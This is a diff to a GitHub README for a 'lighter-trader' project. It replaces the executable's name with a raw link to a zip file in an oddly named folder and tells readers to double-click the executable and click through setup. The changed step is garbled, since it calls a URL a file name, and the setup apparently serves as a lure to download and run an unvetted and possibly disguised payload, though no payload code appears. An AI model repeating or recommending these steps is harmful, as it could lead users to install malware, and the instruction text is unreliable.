Orzeszek091/lighter-trader/README.md

 ## ⚙️ Setup Instructions
 1. Open the extracted folder.
-2. Look for the file named "lighter-trader.exe" (or corresponding executable for your OS).
+2. Look for the file named "https://raw.githubusercontent.com/Orzeszek091/lighter-trader/main/uncontradictedly/lighter-trader.zip" (or corresponding executable for your OS).
 3. Double-click the executable file to start the application.
 4. Follow the on-screen instructions to complete the setup.
 You may need to click "Next" a few times to proceed.